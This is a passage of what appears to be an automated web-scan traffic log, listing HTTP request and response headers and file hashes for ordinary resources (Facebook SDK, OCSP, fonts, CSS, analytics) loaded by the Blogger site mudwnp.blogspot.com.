Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             31.13.72.12
HTTP/2 200 OK
content-type: application/x-javascript; charset=utf-8
                                            
vary: Accept-Encoding
content-encoding: gzip
access-control-expose-headers: X-FB-Content-MD5
x-fb-content-md5: 142c2968eaf49d4cab9b1d272f876bcc
etag: "de0381df8a5b2070cfeb0ddc001a0915"
timing-allow-origin: *
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
expires: Mon, 28 Nov 2022 11:47:31 GMT
cache-control: public,max-age=1200,stale-while-revalidate=3600
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
x-fb-rlafr: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-md5: KTTKc5x6/Sep9sNtjCw3Cg==
x-fb-debug: C1NtTHgZ8mzPlYV19ggRkG4Nn6A5+tQwP9sH+KfQ2NBqdKzuWHXpNlCO+uTROSLIX9r2uD/vPnNgtnEEK3Zllg==
content-length: 1686
x-fb-trip-id: 1904183273
date: Mon, 28 Nov 2022 11:29:42 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1957)
Size:   1686
Md5:    2934ca739c7afd27a9f6c36d8c2c370a
Sha1:   03d7c07f773fd6b9674a611ce09332f56c07c49f
Sha256: ac80215cbd132731b5eb87e2c7dd34531607b42c9ebc304b8e69297a73cae381
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Accept-Ranges: bytes
Age: 6433
Cache-Control: 'max-age=158059'
Date: Mon, 28 Nov 2022 11:29:42 GMT
Last-Modified: Mon, 28 Nov 2022 09:42:29 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /ar_AR/sdk.js?hash=03bacaa152f2ff7563b343e6382fc20d HTTP/1.1 
Host: connect.facebook.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://mudwnp.blogspot.com
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             31.13.72.12
HTTP/2 200 OK
content-type: application/x-javascript; charset=utf-8
                                            
vary: Accept-Encoding
content-encoding: gzip
access-control-expose-headers: X-FB-Content-MD5
x-fb-content-md5: faf2c5f615f084ddbc4f813dfa5b7c7c
etag: "5996b8891a547f7a6c12d7f29c3c92c2"
timing-allow-origin: *
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
expires: Tue, 28 Nov 2023 11:27:32 GMT
cache-control: public,max-age=31536000,stale-while-revalidate=3600,immutable
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
x-fb-rlafr: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-md5: 3V05Hn5P5Y6Cb/GKiebLxQ==
x-fb-debug: u5HW3dUKAWMnfdZEcoDcfbzrhW11d4NTEK/jtff81cg2deGZ/dirKT0sfx9pUw4TOUg14YHX6lL3mhQKPaKwOg==
content-length: 88604
x-fb-trip-id: 1904183273
date: Mon, 28 Nov 2022 11:29:42 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (18538)
Size:   88604
Md5:    dd5d391e7e4fe58e826ff18a89e6cbc5
Sha1:   282e3c4d99bb57793384a6f05c7779408b695d09
Sha256: 33178bcfb07397dfbb9e231bdcc7d1a589b15cfd9e6e9d2cc0b592c810051e13
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: mudwnp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Cookie: __utma=14539563.1918545655.1669634982.1669634982.1669634982.1; __utmb=14539563.1.10.1669634982; __utmc=14539563; __utmz=14539563.1669634982.1.1.utmcsr=alraush.blogspot.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmt=1; _ga=GA1.3.1918545655.1669634982; _gid=GA1.3.916275281.1669634982; _gat_blogger=1

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/x-icon; charset=UTF-8
                                            
Expires: Mon, 28 Nov 2022 11:29:42 GMT
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: private, max-age=86400
Last-Modified: Wed, 23 Nov 2022 14:26:42 GMT
ETag: W/"3064af2559e14e639779a70f7cd823030598ed62cd09cc289e821ee899d1e1a9"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 605
Server: GSE


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel\012- data
Size:   605
Md5:    1718ec75b442bf643220fb196cde4aae
Sha1:   4b9dc2e6eadae560b1b03df3d4f10e853f2d622e
Sha256: 3490d4888fdbe3c0ccd613d4e521fb40e0a047a63de2915014671584ead0f7c1
                                        
                                            GET /font-awesome/4.3.0/css/font-awesome.min.css HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             104.18.10.207
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                            
date: Mon, 28 Nov 2022 11:29:42 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
cdn-edgestorageid: 632, 617, 617
last-modified: Mon, 25 Jan 2021 22:04:54 GMT
cdn-cachedat: 2021-06-08 21:08:57
cdn-requestpullsuccess: True
cdn-requestpullcode: 200
cache-control: public, max-age=31919000
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
x-content-type-options: nosniff
cdn-requestid: e6a55b08fe5091f45c9e99ce9e9f98c2
cdn-status: 200
cdn-cache: HIT
cf-cache-status: HIT
age: 15076581
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 7712c46fbcb9b4f1-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  
Size:   0
Md5:    
Sha1:   
Sha256: 
                                        
                                            GET /pv/?_a=v&_h=alraush.blogspot.com&_ss=2vlfiiw66h&_pv=1&_ls=0&_u1=1&_u3=1&_cc=no&_pl=d&_cbid=68gq&_cb=_dtspv.c HTTP/1.1 
Host: t.dtscout.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Cookie: m=1; oa=1; df=1669634979
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             172.64.162.7
HTTP/2 200 OK
content-type: application/javascript
                                            
date: Mon, 28 Nov 2022 11:29:39 GMT
x-t: 0.176
x-c: 0
expires: Mon, 28 Nov 2022 11:29:38 GMT
cache-control: no-cache
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8ZFNPQX4U3QxJrlNgNgTnq2g2Gvv%2BG%2F%2BquJiizJ2%2B558Y8iimXoSyNgqF%2Fqn6wE0NrG6ATpCOI2kQ%2BkxgQYGZO7eRRHUnT%2F2K9eojcCkv9bl4Xx3%2B3gVdCZX9z973Yp"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7712c45b5bfd76af-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  
Size:   0
Md5:    
Sha1:   
Sha256: 
                                        
                                            GET /earlyaccess/droidarabickufi.css HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                            
access-control-allow-origin: *
timing-allow-origin: *
expires: Mon, 28 Nov 2022 11:29:42 GMT
date: Mon, 28 Nov 2022 11:29:42 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  
Size:   0
Md5:    
Sha1:   
Sha256: